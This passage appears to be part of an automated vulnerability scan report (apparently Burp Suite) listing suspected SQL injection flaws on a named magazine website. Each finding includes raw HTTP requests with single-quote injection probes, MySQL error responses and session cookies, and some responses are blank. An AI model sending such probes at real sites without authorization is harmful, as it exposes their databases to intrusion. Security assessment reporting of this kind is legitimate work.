Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/in-depth?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.83. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/justyesterday

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/justyesterday?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /features/justyesterday?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.84. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/lifestyle

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/lifestyle?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /features/lifestyle?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.85. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/profiles

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/profiles?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/profiles?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.86. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/technical

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/technical?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /features/technical?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

1.87. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/features/type-of-boat

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /features/type-of-boat?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /features/type-of-boat?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.88. http://www.soundingsonline.com/index.php [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The Itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Itemid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' AND ' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.89. http://www.soundingsonline.com/index.php [chronoformname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?option=com_chronocontact&chronoformname=CGPage'' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage'' HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.90. http://www.soundingsonline.com/index.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog&id=98'&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog&id=98''&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.91. http://www.soundingsonline.com/index.php [layout parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The layout parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the layout parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_content&view=category&layout=blog'&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /index.php?option=com_content&view=category&layout=blog''&id=98&Itemid=111 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.92. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

Request 2

GET /index.php?option=com_chronocontact&chronoformname=CGPage&1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

